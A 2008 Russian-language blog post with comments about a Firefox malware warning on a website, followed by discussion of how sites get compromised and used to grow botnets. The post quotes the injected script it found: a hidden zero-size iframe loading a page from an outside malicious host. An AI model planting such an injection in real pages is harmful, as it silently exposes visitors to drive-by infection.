November 2019

S M T W T F S
      12
34 5 678 9
10111213141516
17181920212223
24252627282930

Navigation

Page Summary

Style Credit

Expand Cut Tags

No cut tags

Спасибо товарищу Сталину за наше счастливое детство

dil: (Default)
[personal profile] dil
Monday, April 28th, 2008 02:50 pm


не, спасибо за предупреждение, конечно, но если я всё-таки хочу туда попасть?

Upd: в общем-то, туда ходить действительно не стОит, потому что ничего хорошего вот это не принесёт:
document.write('<iframe src="http:// xanjan .cn/in.cgi?mytraf" width=0 height=0 frameborder=0 style="display:none" onLoad="status=defaultStatus;"></iframe>
Что не отменяет вышенаписанного.
Tags:
Threaded | Top-Level Comments Only

[identity profile] tullamoredew.livejournal.com
Monday, April 28th, 2008 02:12 pm (UTC)
а у нас работает, хотя прокся в фирме стоит очень злобная

[identity profile] cybernatic-cat.livejournal.com
Monday, April 28th, 2008 02:20 pm (UTC)
Более интересно, как и зачем оно такое попало на вполне безобидный сайт...

[identity profile] hj-koshinji.livejournal.com
Monday, April 28th, 2008 02:58 pm (UTC)
Если FF3 beta то отключается в настройках - Безопасность\Security

[identity profile] dil.livejournal.com
Monday, April 28th, 2008 03:28 pm (UTC)
это не прокся, это сам FF

[identity profile] dil.livejournal.com
Monday, April 28th, 2008 03:29 pm (UTC)
ага, только оно отключается вместе с предупреждениями. а вот так, чтобы предупреждало, но пускало, если мне уж так приспичило - не получается

[identity profile] tullamoredew.livejournal.com
Monday, April 28th, 2008 03:37 pm (UTC)
какой нибудь плагин, или просто завышенный секьюрити?

[identity profile] dil.livejournal.com
Monday, April 28th, 2008 03:45 pm (UTC)
дефолтовая настройка безопасности в свежем FF

[identity profile] dil.livejournal.com
Monday, April 28th, 2008 03:46 pm (UTC)
ну тут много вариантов. либо дырка в сайте, либо троян на машине админа, либо дырка на сервере хостера..

[identity profile] cybernatic-cat.livejournal.com
Monday, April 28th, 2008 04:43 pm (UTC)
Мда, варианты - один другого аппетитнее... :)

[identity profile] ex-charset386.livejournal.com
Monday, April 28th, 2008 05:06 pm (UTC)
Для этого есть плагин View This Page in IE. :)

[identity profile] dil.livejournal.com
Monday, April 28th, 2008 05:21 pm (UTC)
На этот случай у меня тут есть живой IE6 в wine :)

[identity profile] dixi.livejournal.com
Monday, April 28th, 2008 06:35 pm (UTC)
ботнеты так и растят часто - заражают пачку сайтов, потом сажают трояна посетителям.

[identity profile] cybernatic-cat.livejournal.com
Monday, April 28th, 2008 07:48 pm (UTC)
Это я понимаю. Но мне непонятно, в какую сторону смотрят авторы движка сайта и его админы. И откуда у них растут руки.

[identity profile] dixi.livejournal.com
Monday, April 28th, 2008 07:52 pm (UTC)
ну нет пока что стандартных систем для контроля целостности серверного кода.
а распространённая практика прямого выкладывания на сайт по фтп очень удобна ботнетчикам.

[identity profile] cybernatic-cat.livejournal.com
Monday, April 28th, 2008 07:59 pm (UTC)
Угу, лично я разработчиков нашего сайта натурально заебался пинать: "Закачал очередное файло - ЗАКРОЙ FTP-ПОРТЫ НА ФАЙРВОЛЛЕ, для того тебе и дан sudo!!"
Как о стенку горохом. Такое ощущение, что web-разработчики зачастую просто не понимают самых тривиальных вещей...

[identity profile] dixi.livejournal.com
Monday, April 28th, 2008 08:02 pm (UTC)
ну, в случае с шаред хостингом никаких портов ни на каком файрволле ни у кого нет.

[identity profile] dil.livejournal.com
Tuesday, April 29th, 2008 06:57 am (UTC)
ну дык вот, например.. http://bugtraq.ru/rsn/archive/2008/04/14.html

[identity profile] dil.livejournal.com
Tuesday, April 29th, 2008 07:04 am (UTC)
http://www.softpanorama.org/Malware/Malicious_web/malicious_iframe_attack.shtml
Threaded | Top-Level Comments Only